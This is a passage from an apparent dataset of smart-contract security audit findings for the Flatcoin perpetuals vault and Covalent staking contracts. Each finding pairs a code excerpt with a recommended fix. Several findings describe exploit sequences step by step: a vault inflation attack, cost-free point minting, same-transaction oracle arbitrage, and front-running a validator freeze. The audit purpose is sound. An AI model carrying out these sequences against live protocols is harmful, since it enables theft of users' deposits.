price=2000e18\\n```\\n\\nWe explain it in two situations:\\n`checkSkewMax` is called before `updateGlobalPositionData`.\\n```\\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 90e18 \\n = 1.16667e18 < skewFractionMax(1.2e18)\\nso checkSkewMax will be passed.\\n```\\n\\n`checkSkewMax` is called after `updateGlobalPositionData`.\\n```\\nIn updateGlobalPositionData: \\nPerpMath._profitLossTotal calculates\\nprofitLossTotal = _globalPositions.sizeOpenedTotal * (int256(price) - int256(globalPosition.lastPrice)) / int256(price) \\n = 100e18 * (2000e18 - 1800e18) / 2000e18 = 100e18 * 200e18 /2000e18 \\n = 10e18 \\n_updateStableCollateralTotal(-profitLossTotal) will deduct 10e18 from stableCollateralTotal. \\nso stableCollateralTotal = 90e18 - 10e18 = 80e18. \\n\\nNow, checkSkewMax is called: \\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 80e18 \\n = 1.3125e18 > skewFractionMax(1.2e18)\\n```\\n\\nTherefore, this new position should not be allowed to open, as this will only make the system more skewed towards the long side.ч```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:--- vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n+++ vault.checkSkewMax(0); //0 means that vault.updateGlobalPositionData has added announcedOpen.additionalSize.\\n// rest of code// rest of code\\n }\\n```\\nчThe `stableCollateralTotal` used by `checkSkewMax` is the value of the total profit that has not yet been settled, which is old value. In this way, when the price of collateral rises, it will cause the system to be more skewed towards the long side.ч```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n -Oracle will not failover as expected during liquidationчmediumчOracle will not failover as expected during liquidation. If the liquidation cannot be executed due to the revert described in the following scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.\\nThe liquidators have the option to update the Pyth price during liquidation. If the liquidators do not intend to update the Pyth price during liquidation, they have to call the second `liquidate(uint256 tokenId)` function at Line 85 below directly, which does not have the `updatePythPrice` modifier.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n\\nIt was understood from the protocol team that the rationale for allowing the liquidators to execute a liquidation without updating the Pyth price is to ensure that the liquidations will work regardless of Pyth's working status, in which case Chainlink is the fallback, and the last oracle price will be used for the liquidation.\\nHowever, upon further review, it was found that the fallback mechanism within the FlatCoin protocol does not work as expected by the protocol team.\\nAssume that Pyth is down. In this case, no one would be able to fetch the latest off-chain price from Pyth network and update Pyth on-chain contract. As a result, the prices stored in the Pyth on-chain contract will become outdated and stale.\\nWhen liquidation is executed in FlatCoin protocol, the following `_getPrice` function will be executed to fetch the price. Line 107 below will fetch the latest price from Chainlink, while Line 108 below will fetch the last available price on the Pyth on-chain contract. When the Pyth on-chain prices have not been updated for a period of time, the deviation between `onchainPrice` and `offchainPrice` will widen till a point where `diffPercent > maxDiffPercent` and a revert will occur at Line 113 below, thus blocking the liquidation from being carried out. As a result, the liquidation mechanism within the FlatCoin protocol will stop working.\\nAlso, the protocol team's goal of allowing the liquidators to execute a liquidation without updating the Pyth price to ensure that the liquidations will work regardless of Pyth's working status will not be achieved.\\n```\\nFile: OracleModule.sol\\n /// @notice Returns the latest 18 decimal price of asset from either Pyth.network or Chainlink.\\n /// @dev It verifies the Pyth network price against Chainlink price (ensure that it is within a threshold).\\n /// @return price The latest 18 decimal price of asset.\\n /// @return timestamp The timestamp of the latest price.\\n function _getPrice(uint32 maxAge) internal view returns (uint256 price, uint256 timestamp) {\\n (uint256 onchainPrice, uint256 onchainTime) = _getOnchainPrice(); // will revert if invalid\\n (uint256 offchainPrice, uint256 offchainTime, bool offchainInvalid) = _getOffchainPrice();\\n bool offchain;\\n\\n uint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\n uint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\n if (diffPercent > maxDiffPercent) revert FlatcoinErrors.PriceMismatch(diffPercent);\\n\\n if (offchainInvalid == false) {\\n // return the freshest price\\n if (offchainTime >= onchainTime) {\\n price = offchainPrice;\\n timestamp = offchainTime;\\n offchain = true;\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n\\n // Check that the timestamp is within the required age\\n if (maxAge < type(uint32).max && timestamp + maxAge < block.timestamp) {\\n revert FlatcoinErrors.PriceStale(\\n offchain ? FlatcoinErrors.PriceSource.OffChain : FlatcoinErrors.PriceSource.OnChain\\n );\\n }\\n }\\n```\\nчConsider implementing a feature to allow the protocol team to disable the price deviation check so that the protocol team can disable it in the event that Pyth network is down for an extended period of time.чThe liquidation mechanism is the core component of the protocol and is important to the solvency of the protocol. If the liquidation cannot be executed due to the revert described in the above scenario, underwater positions and bad debt accumulate in the protocol threaten the solvency of the protocol.ч```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n -Large amounts of points can be minted virtually without any costчmediumчLarge amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value and create unfairness among other protocol users.\\nWhen depositing stable collateral, the LPs only need to pay for the keeper fee. The keeper fee will be sent to the caller who executed the deposit order.\\nWhen withdrawing stable collateral, the LPs need to pay for the keeper fee and withdraw fee. However, there is an instance where one does not need to pay for the withdrawal fee. Per the condition at Line 120 below, if the `totalSupply` is zero, this means that it is the final/last withdrawal. In this case, the withdraw fee will not be applicable and remain at zero.\\n```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n\\nWhen LPs deposit rETH and mint UNIT, the protocol will mint points to the depositor's account as per Line 84 below.\\nAssume that the vault has been newly deployed on-chain. Bob is the first LP to deposit rETH into the vault. Assume for a period of time (e.g., around 30 minutes), there are no other users depositing into the vault except for Bob.\\nBob could perform the following actions to mint points for free:\\nBob announces a deposit order to deposit 100e18 rETH. Paid for the keeper fee. (Acting as a LP).\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the deposit order and mints 100e18 UNIT (Exchange rate 1:1). Protocol also mints 100e18 points to Bob's account. Bob gets back the keeper fee. (Acting as Keeper)\\nImmediately after his `executeDeposit` TX, Bob inserts an \"announce withdraw order\" TX to withdraw all his 100e18 UNIT and pay for the keeper fee.\\nWait 10 seconds for the `minExecutabilityAge` to pass\\nBob executes the withdraw order and receives back his initial investment of 100e18 rETH. Since he is the only LP in the protocol, it is considered the final/last withdrawal, and he does not need to pay any withdraw fee. He also got back his keeper fee. (Acting as Keeper)\\nEach attack requires 20 seconds (10 + 10) to be executed. Bob could rinse and repeat the attack until he was no longer the only LP in the system, where he had to pay for the withdraw fee, which might make this attack unprofitable.\\nIf Bob is the only LP in the system for 30 minutes, he could gain 9000e18 points ((30 minutes / 20 seconds) * 100e18 ) for free as Bob could get back his keeper fee and does not incur any withdraw fee. The only thing that Bob needs to pay for is the gas fee, which is extremely cheap on L2 like Base.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n..SNIP..\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n..SNIP..\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n..SNIP..\\n // Mint points\\n IPointsModule pointsModule = IPointsModule(vault.moduleAddress(FlatcoinModuleKeys._POINTS_MODULE_KEY));\\n pointsModule.mintDeposit(_account, _announcedDeposit.depositAmount);\\n```\\nчOne approach that could mitigate this risk is also to impose withdraw fee for the final/last withdrawal so that no one could abuse this exception to perform any attack that was once not profitable due to the need to pay withdraw fee.\\nIn addition, consider deducting the points once a position is closed or reduced in size so that no one can attempt to open and adjust/close a position repeatedly to obtain more points.чLarge amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value from the protocol and create unfairness among other protocol users.ч```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n -Vault Inflation AttackчmediumчMalicious users can perform an inflation attack against the vault to steal the assets of the victim.\\nA malicious user can perform a donation to execute a classic first depositor/ERC4626 inflation Attack against the FlatCoin vault. The general process of this attack is well-known, and a detailed explanation of this attack can be found in many of the resources such as the following:\\nIn short, to kick-start the attack, the malicious user will often usually mint the smallest possible amount of shares (e.g., 1 wei) and then donate significant assets to the vault to inflate the number of assets per share. Subsequently, it will cause a rounding error when other users deposit.\\nHowever, in Flatcoin, there are various safeguards in place to mitigate this attack. Thus, one would need to perform additional steps to workaround/bypass the existing controls.\\nLet's divide the setup of the attack into two main parts:\\nMalicious user mint 1 mint of share\\nDonate or transfer assets to the vault to inflate the assets per share\\nPart 1 - Malicious user mint 1 mint of share\\nUsers could attempt to mint 1 wei of share. However, the validation check at Line 79 will revert as the share minted is less than `MIN_LIQUIDITY` = 10_000. However, this minimum liquidation requirement check can be bypassed.\\n```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n\\nFirst, Bob mints 10000 wei shares via `executeDeposit` function. Next, Bob withdraws 9999 wei shares via the `executeWithdraw`. In the end, Bob successfully owned only 1 wei share, which is the prerequisite for this attack.\\nPart 2 - Donate or transfer assets to the vault to inflate the assets per share\\nThe vault tracks the number of collateral within the state variables. Thus, simply transferring rETH collateral to the vault directly will not work, and the assets per share will remain the same.\\nTo work around this, Bob creates a large number of accounts (with different wallet addresses). He could choose any or both of the following methods to indirectly transfer collateral to the LP pool/vault to inflate the assets per share:\\nOpen a large number of leveraged long positions with the intention of incurring large amounts of losses. The long positions' losses are the gains of the LPs, and the collateral per share will increase.\\nOpen a large number of leveraged long positions till the max skew of 120%. Thus, this will cause the funding rate to increase, and the long will have to pay the LPs, which will also increase the collateral per share.\\nTriggering rounding error\\nThe `stableCollateralPerShare` will be inflated at this point. Following is the formula used to determine the number of shares minted to the depositor.\\nIf the `depositAmount` by the victim is not sufficiently large enough, the amount of shares minted to the depositor will round down to zero.\\n```\\n_collateralPerShare = (stableBalance * (10 ** decimals())) / totalSupply;\\n_liquidityMinted = (depositAmount * (10 ** decimals())) / _collateralPerShare\\n```\\n\\nFinally, the attacker withdraws their share from the pool. Since they are the only ones with any shares, this withdrawal equals the balance of the vault. This means the attacker also withdraws the tokens deposited by the victim earlier.чA `MIN_LIQUIDITY` amount of shares needs to exist within the vault to guard against a common inflation attack.\\nHowever, the current approach of only checking if the `totalSupply() < MIN_LIQUIDITY` is not sufficient, and could be bypassed by making use of the withdraw function.\\nA more robust approach to ensuring that there is always a minimum number of shares to guard against inflation attack is to mint a certain amount of shares to zero address (dead address) during contract deployment (similar to what has been implemented in Uniswap V2).чMalicous users could steal the assets of the victim.ч```\\nFile: StableModule.sol\\n function executeDeposit(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableDeposit calldata _announcedDeposit\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _liquidityMinted) {\\n uint256 depositAmount = _announcedDeposit.depositAmount;\\n\\n uint32 maxAge = _getMaxAge(_executableAtTime);\\n\\n _liquidityMinted = (depositAmount * (10 ** decimals())) / stableCollateralPerShare(maxAge);\\n\\n if (_liquidityMinted < _announcedDeposit.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(_liquidityMinted, _announcedDeposit.minAmountOut);\\n\\n _mint(_account, _liquidityMinted);\\n\\n vault.updateStableCollateralTotal(int256(depositAmount));\\n\\n if (totalSupply() < MIN_LIQUIDITY) // @audit-info MIN_LIQUIDITY = 10_000\\n revert FlatcoinErrors.AmountTooSmall({amount: totalSupply(), minAmount: MIN_LIQUIDITY});\\n```\\n -Long traders unable to withdraw their assetsчmediumчWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, the protocol will be bricked. As a result, the margin deposited and gain of the long traders can no longer be withdrawn and the LPs cannot withdraw their collateral, leading to a loss of assets for the users.\\nPer Line 97 below, if the collateral balance is less than the tracked balance, the `_getCollateralNet` invariant check will revert.\\n```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(\"collateralNet\");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n\\nAssume that:\\nBob's long position: Margin = 50 ETH\\nAlice's LP: Deposited = 50 ETH\\nCollateral Balance = 100 ETH\\nTracked Balance = 100 ETH (Stable Collateral Total = 50 ETH, Margin Deposited Total = 50 ETH)\\nAssume that Bob's long position gains a profit of 51 ETH.\\nThe following actions will trigger the `updateGlobalPositionData` function internally: executeOpen, executeAdjust, executeClose, and liquidation.\\nWhen the `FlatcoinVault.updateGlobalPositionData` function is triggered to update the global position data:\\n```\\nprofitLossTotal = 51 ETH (gain by long)\\n\\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal\\nnewMarginDepositedTotal = 50 ETH + 0 + 51 ETH = 101 ETH\\n\\n_updateStableCollateralTotal(-51 ETH)\\nnewStableCollateralTotal = stableCollateralTotal + _stableCollateralAdjustment\\nnewStableCollateralTotal = 50 ETH + (-51 ETH) = -1 ETH\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0;\\nstableCollateralTotal = 0\\n```\\n\\nIn this case, the state becomes as follows:\\nCollateral Balance = 100 ETH\\nTracked Balance = 101 ETH (Stable Collateral Total = 0 ETH, Margin Deposited Total = 101 ETH)\\nNotice that the Collateral Balance and Tracked Balance are no longer in sync. As such, the revert will occur when the `_getCollateralNet` invariant checks are performed.\\nWhenever the protocol reaches a state where the long trader's profit is larger than LP's stable collateral total, this issue will occur, and the protocol will be bricked. The margin deposited and gain of the long traders can no longer be withdrawn from the protocol. The LPs also cannot withdraw their collateral.\\nThe reason is that the `_getCollateralNet` invariant checks are performed in all functions of the protocol that can be accessed by users (listed below):\\nDeposit\\nWithdraw\\nOpen Position\\nAdjust Position\\nClose Position\\nLiquidateчCurrently, when the loss of the LP is more than the existing `stableCollateralTotal`, the loss will be capped at zero, and it will not go negative. In the above example, the `stableCollateralTotal` is 50, and the loss is 51. Thus, the `stableCollateralTotal` is set to zero instead of -1.\\nThe loss of LP and the gain of the trader should be aligned or symmetric. However, this is not the case in the current implementation. In the above example, the gain of traders is 51, while the loss of LP is 50, which results in a discrepancy here.\\nTo fix the issue, the loss of LP and the gain of the trader should be aligned. For instance, in the above example, if the loss of LP is capped at 50, then the profit of traders must also be capped at 50.\\nFollowing is a high-level logic of the fix:\\n```\\nIf (profitLossTotal > stableCollateralTotal): // (51 > 50) => True\\n profitLossTotal = stableCollateralTotal // profitLossTotal = 50\\n \\nnewMarginDepositedTotal = marginDepositedTotal + marginDelta + profitLossTotal // 50 + 0 + 50 = 100\\n \\nnewStableCollateralTotal = stableCollateralTotal + (-profitLossTotal) // 50 + (-50) = 0\\nstableCollateralTotal = (newStableCollateralTotal > 0) ? newStableCollateralTotal : 0; // stableCollateralTotal = 0\\n```\\n\\nThe comment above verifies that the logic is working as intended.чLoss of assets for the users. Since the protocol is bricked due to revert, the long traders are unable to withdraw their deposited margin and gain and the LPs cannot withdraw their collateral.ч```\\nFile: InvariantChecks.sol\\n /// @dev Returns the difference between actual total collateral balance in the vault vs tracked collateral\\n /// Tracked collateral should be updated when depositing to stable LP (stableCollateralTotal) or\\n /// opening leveraged positions (marginDepositedTotal).\\n /// TODO: Account for margin of error due to rounding.\\n function _getCollateralNet(IFlatcoinVault vault) private view returns (uint256 netCollateral) {\\n uint256 collateralBalance = vault.collateral().balanceOf(address(vault));\\n uint256 trackedCollateral = vault.stableCollateralTotal() + vault.getGlobalPositions().marginDepositedTotal;\\n\\n if (collateralBalance < trackedCollateral) revert FlatcoinErrors.InvariantViolation(\"collateralNet\");\\n\\n return collateralBalance - trackedCollateral;\\n }\\n```\\n -Oracle can return different prices in same transactionчmediumчThe Pyth network oracle contract allows to submit and read two different prices in the same transaction. This can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.\\n`OracleModule.sol` uses Pyth network as the primary source of price feeds. This oracle works in the following way:\\nA dedicated network keeps track of the latest price consensus, together with the timestamp.\\nThis data is queried off-chain and submitted to the on-chain oracle.\\nIt is checked that the data submitted is valid and the new price data is stored.\\nNew requests for the latest price will now return the data submitted until a more recent price is submitted.\\nOne thing to note is that the Pyth network is constantly updating the latest price (every 400ms), so when a new price is submitted on-chain it is not necessary that the price is the latest one. Otherwise, the process of querying the data off-chain, building the transaction, and submitting it on-chain would be required to be done with a latency of less than 400ms, which is not feasible. This makes it possible to submit two different prices in the same transaction and, thus, fetch two different prices in the same transaction.\\nThis can be used to create some arbitrage opportunities that can make a profit with no risk.\\nHow this can be exploited\\nAn example of how this can be exploited, and showed in the PoC, would be:\\nCreate a small leverage position.\\nAnnounce an adjustment order to increase the size of the position by some amount.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is higher than the first one.\\nExecute the adjustment order sending the first price.\\nExecute the limit close order sending the second price.\\nThe result is approximately a profit of\\n```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n\\nNote: For simplicity, we do not take into account the initial size of the position, which in any case can be insignificant compared to the adjustment size. The keeper fee is also not included, as is the owner of the position that is executing the orders.\\nThe following things are required to make a profit out of this attack:\\nSubmit the orders before other keepers. This can be easily achieved, as there are not always enough incentives to execute the orders as soon as possible.\\nObtain a positive delta between two prices in the time frame where the orders are executable that is greater than twice the trade fees. This can be very feasible, especially in moments of high volatility. Note also, that this requirement can be lowered to a delta greater than once the trade fees if we take into account that there is currently another vulnerability that allows to avoid paying fees for the limit order.\\nIn the case of not being able to obtain the required delta or observing that a keeper has already submitted a transaction to execute them before the delta is obtained, the user can simply cancel the limit order and will have just the adjustment order executed.\\nAnother possible strategy would pass through the following steps:\\nCreate a leverage position.\\nAnnounce another leverage position with the same size.\\nIn the same block, announce a limit close order.\\nAfter the minimum execution time has elapsed, retrieve two prices from the Pyth oracle where the second price is lower than the first one.\\nExecute the limit close order sending the first price.\\nExecute the open order sending the second price.\\nThe result in this case is having a position with the same size as the original one, but having either lowered the `position.lastPrice` or getting a profit from the original position, depending on how the price has moved since the original position was opened.\\n\\nч```\\nFile: OracleModule.sol\\n FlatcoinStructs.OffchainOracle public offchainOracle; // Offchain Pyth network oracle\\n\\n// Add the line below\\n uint256 public lastOffchainUpdate;\\n\\n (// rest of code)\\n\\n function updatePythPrice(address sender, bytes[] calldata priceUpdateData) external payable nonReentrant {\\n// Add the line below\\n if (lastOffchainUpdate >= block.timestamp) return;\\n// Add the line below\\n lastOffchainUpdate = block.timestamp;\\n// Add the line below\\n\\n // Get fee amount to pay to Pyth\\n uint256 fee = offchainOracle.oracleContract.getUpdateFee(priceUpdateData);\\n```\\nчDifferent oracle prices can be fetched in the same transaction, which can be used to create arbitrage opportunities that can make a profit with no risk at the expense of users on the other side of the trade.ч```\\nadjustmentSize * (secondPrice - firstPrice) - (adjustmentSize * tradeFees * 2)\\n```\\n -OperationalStaking may not possess enough CQT for the last withdrawalчmediumчBoth `_sharesToTokens` and `_tokensToShares` round down instead of rounding off against the user. This can result in users withdrawing few weis more than they should, which in turn would make the last CQT transfer from the contract revert due to insufficient balance.\\nWhen users `stake`, the shares they will receive is calculated via _tokensToShares:\\n```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n\\nSo the rounding will be against the user, or zero if the user provided the right amount of CQT.\\nWhen users unstake, their shares are decreased by\\n```\\n function _sharesToTokens(\\n uint128 sharesN,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(sharesN) * uint256(rate)) / DIVIDER);\\n }\\n```\\n\\nSo it is possible to `stake` and `unstake` such amounts, that would leave dust amount of shares on user's balance after their full withdrawal. However, dust amounts can not be withdrawn due to the check in _redeemRewards:\\n```\\n require(\\n effectiveAmount >= REWARD_REDEEM_THRESHOLD,\\n \"Requested amount must be higher than redeem threshold\"\\n );\\n```\\n\\nBut, if the user does not withdraw immediately, but instead does it after the multiplier is increased, the dust he received from rounding error becomes withdrawable, because his `totalUnlockedValue` becomes greater than `REWARD_REDEEM_THRESHOLD`.\\nSo the user will end up withdrawing more than their `initialStake + shareOfRewards`, which means, if the rounding after all other operations stays net-zero for the protocol, there won't be enough CQT for the last CQT withdrawal (be it `transferUnstakedOut`, `redeemRewards`, or redeemCommission).\\nFoundry PoCч`_sharesToTokens` and `_tokensToShares`, instead of rounding down, should always round off against the user.чVictim's transactions will keep reverting unless they figure out that they need to decrease their withdrawal amount.ч```\\n function _tokensToShares(\\n uint128 amount,\\n uint128 rate\\n ) internal view returns (uint128) {\\n return uint128((uint256(amount) * DIVIDER) / uint256(rate));\\n }\\n```\\n -Frontrunning validator freeze to withdraw tokensчmediumчCovalent implements a freeze mechanism to disable malicious Validators, this allows the protocol to block all interactions with a validator when he behaves maliciously. Covalent also implements a timelock to ensure tokens are only withdraw after a certain amount of time. After the cooldown ends, tokens can always be withdrawn.\\nFollowing problem arise now: because the tokens can always be withdrawn, a malicious Validator can listen for a potential \"freeze\" transaction in the mempool, front run this transaction to unstake his tokens and withdraw them after the cooldown end.\\nAlmost every action on the Operational Staking contract checks if the validator is frozen or not:\\n```\\n require(!v.frozen, \"Validator is frozen\");\\n```\\n\\nThe methods transferUnstakedOut() and recoverUnstaking() are both not checking for this, making the unstake transaction front runnable. Here are the only checks of transferUnstakedOut():\\n```\\nrequire(validatorId < validatorsN, \"Invalid validator\");\\n require(_validators[validatorId].unstakings[msg.sender].length > unstakingId, \"Unstaking does not exist\");\\n Unstaking storage us = _validators[validatorId].unstakings[msg.sender][unstakingId];\\n require(us.amount >= amount, \"Unstaking has less tokens\");\\n```\\n\\nThis makes following attack possible:\\nValidator cheats and gets rewarded fees.\\nProtocol notices the misbehavior and initiates a Freeze transaction\\nValidator sees the transaction and starts a unstake() transaction with higher gas.\\nValidator gets frozen, but the unstaking is already done\\nValidator waits for cooldown and withdraws tokens.\\nNow the validator has gained unfairly obtained tokens and withdrawn his stake.чImplement a check if validator is frozen on `transferUnstakedOut()` and `recoverUnstaking()`, and revert transaction if true.\\nIf freezing all unstakings is undesirable (e.g. not freezing honest unstakes), the sponsor may consider storing the unstake timestamp as well:\\nStore the unstaking block number for each unstake.\\nFreeze the validator from a certain past block only, only unstakings that occur from that block onwards will get frozen.чMalicious validators can front run freeze to withdraw tokens.ч```\\n require(!v.frozen, \"Validator is frozen\");\\n```\\n -`validatorMaxStake` can be bypassed by using `setValidatorAddress()`чmediumч`setValidatorAddress()` allows a validator to migrate to a new address of their choice. However, the current logic only stacks up the old address' stake to the new one, never checking `validatorMaxStake`.\\nThe current logic for `setValidatorAddress()` is as follow:\\n```\\nfunction setValidatorAddress(uint128 validatorId, address newAddress) external whenNotPaused {\\n // // rest of code\\n v.stakings[newAddress].shares += v.stakings[msg.sender].shares;\\n v.stakings[newAddress].staked += v.stakings[msg.sender].staked;\\n delete v.stakings[msg.sender];\\n // // rest of code\\n}\\n```\\n\\nThe old address' stake is simply stacked on top of the new address' stake. There are no other checks for this amount, even though the new address may already have contained a stake.\\nThen the combined total of the two stakings may exceed `validatorMaxStake`. This accordingly allows the new (validator) staker's amount to bypass said threshold, breaking an important invariant of the protocol.\\nBob the validator has a self-stake equal to `validatorMaxStake`.\\nBob has another address, B2, with some stake delegated to Bob's validator.\\nBob 